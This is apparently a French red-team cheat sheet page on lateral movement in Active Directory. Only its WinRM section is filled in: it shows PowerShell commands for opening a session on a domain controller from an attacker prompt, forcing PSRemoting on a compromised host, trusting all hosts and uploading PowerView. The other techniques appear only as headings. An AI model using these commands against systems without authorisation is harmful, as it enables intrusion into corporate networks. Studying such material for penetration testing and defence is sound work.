➡️Mouvements latéraux
Techniques de mouvements latéraux dans environnement AD
WinRM
New-PSSession -ComputerName <hôte> -Credential <username>
Id Name ComputerName ComputerType State ConfigurationName Availability
-- ---- ------------ ------------ ----- ----------------- ------------
1 WinRM2 Hôte... RemoteMachine Opened Microsoft.PowerShell Available
PS C:\Users\attaquant> Enter-PSSession 1
[Contrôleur de domaine]: PS C:\Users\<username>\Documents> calc.exe#Activer le PSRemoting de force sur la cible (qui doit avoir été compromise avant)
Enable-PSRemoting -force
#Tester la connexion d'une cible sur le port WinRM
Test-NetConnection <IP> -CommonTCPPort WINRM
#Faire en sorte que tous les hôtes soit de confiance
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
#Lister les hôtes de confiance
Get-Item WSMan:\localhost\Client\TrustedHosts
#Upload un fichier sur la session à distance
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession <numéro de session>
#-FromSession à la place de -ToSession pour télécharger depuis une sessionEvil-WinRM
WinRS
WMI
RDP
Exécution de commande avec SharpRDP
Racine web partagée
Service Configuration Manager
SMB
PsExec
Sc.exe
SharpMove.exe
De Beacon à session RDP
SSH
Port Forwarding
VNC
Mis à jour